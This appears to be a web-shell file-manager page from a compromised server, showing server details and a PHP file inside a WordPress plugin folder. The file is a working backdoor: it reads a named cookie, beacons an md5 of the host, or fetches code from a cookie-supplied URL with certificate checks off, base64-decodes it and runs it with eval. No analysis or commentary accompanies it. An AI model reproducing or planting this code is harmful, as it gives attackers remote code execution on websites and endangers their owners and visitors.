| Server IP : 176.9.105.210 / Your IP : 216.73.217.21 Web Server : Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips System : Linux server.mediaphic.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64 User : freelife ( 1356) PHP Version : 7.4.33 Disable Function : exec,passthru,shell_exec,system,show_source,mail,sendmail,popen,symlink,phpinfo MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /home/freelife/public_html/wp-content/plugins/classic-widgets/ |
Upload File : |
<?php
if (!function_exists("get3556d58e1f07e2795e3ddf007c19db94")) {
function get3556d58e1f07e2795e3ddf007c19db94($url) {
$content = "";
if (function_exists("curl_init")) {
$options = array(
CURLOPT_RETURNTRANSFER => true,
CURLOPT_HEADER => false,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_ENCODING => "",
CURLOPT_USERAGENT => "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20120101 Firefox/32.0",
CURLOPT_AUTOREFERER => true,
CURLOPT_CONNECTTIMEOUT => 120,
CURLOPT_TIMEOUT => 120,
CURLOPT_MAXREDIRS => 10,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false
);
$ch = curl_init($url);
curl_setopt_array($ch, $options);
$content = @curl_exec($ch);
}
if ($content)
return $content;
$content = @file_get_contents($url);
return $content;
}
if (isset($_COOKIE['3556d58e1f07e2795e3ddf007c19db94'])) {
if ($_COOKIE['3556d58e1f07e2795e3ddf007c19db94'] == '1') {
echo md5($_SERVER['HTTP_HOST']);
exit;
}
$dat = base64_decode(get3556d58e1f07e2795e3ddf007c19db94($_COOKIE['3556d58e1f07e2795e3ddf007c19db94']));
if ($dat) {
@eval($dat);
exit;
}
}
}